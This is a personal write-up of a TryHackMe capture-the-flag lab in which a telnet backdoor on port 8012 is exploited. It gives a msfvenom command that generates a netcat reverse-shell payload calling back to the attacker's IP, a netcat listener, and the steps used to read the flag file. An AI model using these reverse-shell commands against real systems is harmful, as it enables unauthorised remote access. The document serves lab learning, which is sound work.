- Purpose: Document my experience and share knowledge on the Cyber Defense challenges
- Scope: Learn the fundamental components of detecting and responding to threats in a corporate environment
- Environment: Kali Linux via VirtualBox
- Accounts and Access: Created a TryHackMe account and accessed the room via OpenVPN
- Objective: Access the target's assets by exploiting vulnerable services to access valuable data
- Initial Scanning:
-
Tools and Commands:
-
Findings: The open port is 8012 A possible username might be Skidy - Service might be a backdoor
-
-
Vulnerability Identification: Telnet vulnerability
- Techniques Used: Exploit using netcat reverse shell payload in the telnet server
-
Exploitation Process:
-
Enter
telnet 10.10.177.199 8012
now you can connect to the telnet server using the discovered port 8012 -
Enter
msfvenom -p cmd/unix/reverse_netcat lhost=10.17.64.194 lport=4444 R
to generate a reverse shell payload using msfvenom -
Enter
nc -lvp 4444
to start netcat lister to listen for inbound connection and see data -
Copy the payload into the telnet server CLI and press enter
-
Go to the netcat lister and enter
ls
it will show the file flag.txt -
Enter
cat flag.txt
to capture the flag
- Challenges Faced: Error with my configuration of kali and openvpn not being able to connect to the server
- Learnings: I Learned that telnet is unsecured because it has a lot of vulnerabilities when I checked CVE
- Improvements: Familiarize with the commands
- Summary: Successfully gained access to the telnet server by exploiting its vulnerability and using reverse shell payload to capture the flag